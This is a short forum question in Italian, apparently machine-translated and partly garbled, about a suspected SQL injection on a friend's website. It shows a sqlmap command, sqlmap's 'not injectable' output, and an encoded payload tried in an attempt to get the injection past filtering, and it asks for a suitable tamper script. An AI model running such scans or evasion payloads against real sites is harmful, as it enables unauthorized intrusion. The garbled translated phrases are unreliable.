Attualmente sto ripetendo il sito web dei miei amici. Ho trovato un'iniezione SQL con l'aiuto di acunetix:
- URL encoded GET input for was set to 1#####
Error message found:
supplied argument is not a valid MySQL result
Quindi ho provato a eseguire una normale sqlmap:
./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25
Output:
[11:16:31] [WARNING] URI parameter '#1*' is not injectable [11:16:31] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Quindi ho bisogno di un modo per includere il% co_de di quei #
Provato (for=1%00%c0%a7%c0%a2)
e --string
ma non ha fatto il lavoro. Forse c'è una manomissione per questo?